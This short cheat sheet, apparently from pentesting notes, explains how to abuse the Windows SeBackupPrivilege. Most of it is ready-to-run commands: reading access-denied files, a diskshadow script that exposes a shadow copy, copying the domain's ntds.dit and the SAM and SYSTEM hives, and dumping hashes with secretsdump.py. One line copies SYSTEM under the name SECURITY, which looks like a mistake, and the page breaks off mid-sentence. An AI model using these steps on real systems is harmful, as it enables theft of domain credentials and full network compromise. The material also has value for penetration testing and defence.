SeBackupPrivilege
The SeBackupPrivilege is a user right in Windows that allows members of the Backup Operators group to bypass file security to back up files and directories. It enables users to read and back up files regardless of permissions. This privilege is essential for creating backups but also comes with significant security risks if misused. It's typically assigned to system administrators or backup operators.
We can use this script to enable SeBackupPrivilege if it's disabled. We can use Set-SeBackupPrivilege once dlls are imported. And Get-SeBackupPrivilege to verify if it's enabled or not.
We can also use following command to read content if we get access denied:
Copy-FileSeBackupPrivilege 'C:\Secret\Hidden.txt' .\Hidden.txt ## Copy and
cat .\Contract.txt ## Read
Targetting for NTDS.dit
diskshadow.exe
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit
dir E: ## Now check E Drive
# Copy ntds.dit from new mapped drive using https://github.com/giuliano108/SeBackupPrivilege
Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Users\USERNAME\Desktop
# We can transfer it to Attack-Host and use secretdumps.py
python3 /path/to/secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
# Or use https://www.dsinternals.com/en/dumping-ntds-dit-files-using-powershell/
SAM and SYSTEM registry hives
Copy-FileSeBackupPrivilege 'E:\windows\system32\config\SAM' ./SAM
Copy-FileSeBackupPrivilege 'E:\windows\system32\config\SYSTEM' ./SYSTEM
Copy-FileSeBackupPrivilege 'E:\windows\system32\config\SYSTEM' ./SECURITY
We can now transfer the files to our attack machine using any technique we're familiar with and use secretdumps.py.
More
More about these attack is available at: